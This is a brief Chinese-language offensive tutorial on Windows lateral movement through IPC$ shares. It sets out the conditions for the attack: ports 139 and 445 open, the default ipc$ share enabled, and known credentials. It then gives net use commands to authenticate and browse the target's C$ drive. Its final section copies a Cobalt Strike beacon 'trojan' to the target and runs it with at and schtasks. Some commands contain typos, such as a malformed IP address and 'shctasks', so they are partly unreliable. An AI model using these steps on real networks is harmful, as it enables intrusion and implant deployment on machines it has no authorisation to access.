IPC横向
IPC横向
IPC(Internet Process Connection)共享命名管道的资源,
是为了实现进程间通信而开放的命名管道。
IPC可以通过验证用户名和密码获得相应的权限,使用139、445端口。
利用条件
1
2
3
| 1,目标主机开启了139和445端口
2,目标主机管理员开启了ipc$默认共享:
3,知道目标机的账号密码
|
建立IPC连接
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| 建立IPC连接命令:
net use \\172.16.1.132\ipc$ "password" /user:"Administrator" #工作组
net use \server\ipc$"password" /user:domain\username #域内
查看连接是否建立
net use
查看目标主机的文件
dir \\172.16.1.132\c$
查看目标主机的共享
net view 172.16.1.132
断开连接:
net use \\172.16.1.132\ipc$ /del
|
上传木马,任务计划执行木马上线CS
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| 上传木马
copy beacon.exe \\172.16.132\c$
创建计划任务(at<2012、schtasks>=2012):
at \\172.16.1.132 19:00 c:\beacon.exe
schtasks 在windows版本大于等于windows2012下使用
shctasks /create /s 192.168.xx.xx /run "system" /tn adduser /scDAILY /tr c:\1.bat /F #创建adduser任务对应批处理脚本
schtasks /run /s 192.168.xx.xx /tn adduser /i #运行adduser任务
schtasks /delete /s 192.168.xx.xx /tn adduser /f #删除adduser任务
|